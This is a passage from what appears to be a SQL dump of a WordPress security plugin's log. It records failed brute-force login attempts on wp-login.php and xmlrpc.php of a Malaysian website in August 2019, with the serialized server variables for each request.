Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"207.180.192.202\";s:11:\"REMOTE_PORT\";s:5:\"53212\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTtsIir4pgxiIHnHK5ADQAAAc4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566895536.553\";s:12:\"REQUEST_TIME\";s:10:\"1566895536\";}}','notice','2019-08-27 08:45:38','2019-08-27 08:45:37',17687816,19172424,'https://bintara.com.my/wp-login.php',1,0,'207.180.192.202'),(23403,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"207.180.192.202\";s:11:\"REMOTE_PORT\";s:5:\"53212\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTtsIir4pgxiIHnHK5ADQAAAc4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566895536.553\";s:12:\"REQUEST_TIME\";s:10:\"1566895536\";}}','notice','2019-08-27 08:45:38','2019-08-27 08:45:37',17849664,19172424,'https://bintara.com.my/wp-login.php',1,0,'207.180.192.202'),(23404,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"207.180.192.202\";s:11:\"REMOTE_PORT\";s:5:\"54294\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTttYtV65@1l3w0lHNxPgAAAEU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566895541.4438\";s:12:\"REQUEST_TIME\";s:10:\"1566895541\";}}','notice','2019-08-27 08:45:42','2019-08-27 08:45:41',18202376,19502248,'https://bintara.com.my/xmlrpc.php',1,0,'207.180.192.202'),(23405,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.222.34\";s:11:\"REMOTE_PORT\";s:5:\"48810\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTwvYtV65@1l3w0lHNzYAAAAEc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566896317.4212\";s:12:\"REQUEST_TIME\";s:10:\"1566896317\";}}','notice','2019-08-27 08:58:38','2019-08-27 08:58:37',17684504,19174512,'https://bintara.com.my/wp-login.php',1,0,'167.71.222.34'),(23406,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.222.34\";s:11:\"REMOTE_PORT\";s:5:\"49662\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTww7dCvC5@KvzqwiFQewAAABc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566896323.1772\";s:12:\"REQUEST_TIME\";s:10:\"1566896323\";}}','notice','2019-08-27 08:58:45','2019-08-27 08:58:43',18200960,19500592,'https://bintara.com.my/xmlrpc.php',1,0,'167.71.222.34'),(23407,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"173.212.240.243\";s:11:\"REMOTE_PORT\";s:5:\"57532\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTya4tV65@1l3w0lHN0cAAAAEY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566896747.8396\";s:12:\"REQUEST_TIME\";s:10:\"1566896747\";}}','notice','2019-08-27 09:05:49','2019-08-27 09:05:48',17685504,19175792,'https://bintara.com.my/wp-login.php',1,0,'173.212.240.243'),(23408,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"173.212.240.243\";s:11:\"REMOTE_PORT\";s:5:\"57948\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTybotV65@1l3w0lHN0cQAAAFA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566896751.0153\";s:12:\"REQUEST_TIME\";s:10:\"1566896751\";}}','notice','2019-08-27 09:05:52','2019-08-27 09:05:51',18199880,19496064,'https://bintara.com.my/xmlrpc.php',1,0,'173.212.240.243'),(23409,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.65.155.58\";s:11:\"REMOTE_PORT\";s:5:\"52992\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWT0i7dCvC5@KvzqwiFRtQAAAAY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566897291.5364\";s:12:\"REQUEST_TIME\";s:10:\"1566897291\";}}','notice','2019-08-27 09:14:52','2019-08-27 09:14:51',17689632,19175224,'https://bintara.com.my/wp-login.php',1,0,'159.65.155.58'),(23410,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.65.155.58\";s:11:\"REMOTE_PORT\";s:5:\"52992\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWT0i7dCvC5@KvzqwiFRtQAAAAY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566897291.5364\";s:12:\"REQUEST_TIME\";s:10:\"1566897291\";}}','notice','2019-08-27 09:14:53','2019-08-27 09:14:51',17850680,19175224,'https://bintara.com.my/wp-login.php',1,0,'159.65.155.58'),(23411,0,'brute_force','invalid-login::username-test','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"test\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 